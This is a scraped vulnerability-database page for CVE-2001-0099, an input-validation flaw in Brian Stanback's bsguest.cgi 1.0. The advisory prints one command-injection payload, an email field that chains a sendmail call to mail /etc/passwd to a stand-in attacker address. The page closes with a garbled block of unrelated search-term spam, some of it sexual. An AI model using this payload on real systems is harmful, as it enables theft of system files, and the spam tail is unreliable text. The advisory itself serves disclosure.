about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Brian Stanback bsguest.cgi Remote Command Execution Vulnerability


Title Brian Stanback bsguest.cgi Remote Command Execution Vulnerability
Published 2000-12-20-12:00AM
Updated 2000-12-20-12:00AM
Class Input Validation Error
CVE   CVE-2001-0099
Remote  Yes
Local  Yes
Credit  Reported to bugtraq by <rivendell_team@yahoo.com> on Wed, 20 Dec 2000. Discovered by Elf <whitehatjoe@hotmail.com>
Vulnerable  Brian Stanback bsguest.cgi 1.0
Not Vulnerable  
Code   Excerpted from bugtraq post by <rivendell_team@yahoo.com> / Elf <whitehatjoe@hotmail.com>

---

Attacker enters his email address as <whitehatjoe@hotmail.com>

'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd',

server mails a confirmation letter along with the passwd file to the attacker.

---
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 07:45:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
tara Acterssex GET /galle p...Fgifs/ Acterssex Monkey sex www.qizhon www.51bhz. Www sexi www.bsseo. www.like-n Sexyboom.c news for c coritochat w.w.w.tris php-...at_ diner dash www.creamp http://www mimi@neko. Aflam+arab Www.Maples hamatchi jioo.xiaof any video home cinem It is nece skins/adva needforfun www.xysst. nanga Nudephotos Revutsky Crack Data Z....54.17 /search/ex SEXCARTON. Wap Phoner indian hot Nametha se 10.714.zhu Hotmodais Www.saniam 2...l/fx29 tclhttpd exploit ce AUNY SEX w,v hfhpdi W w w sex www.youyag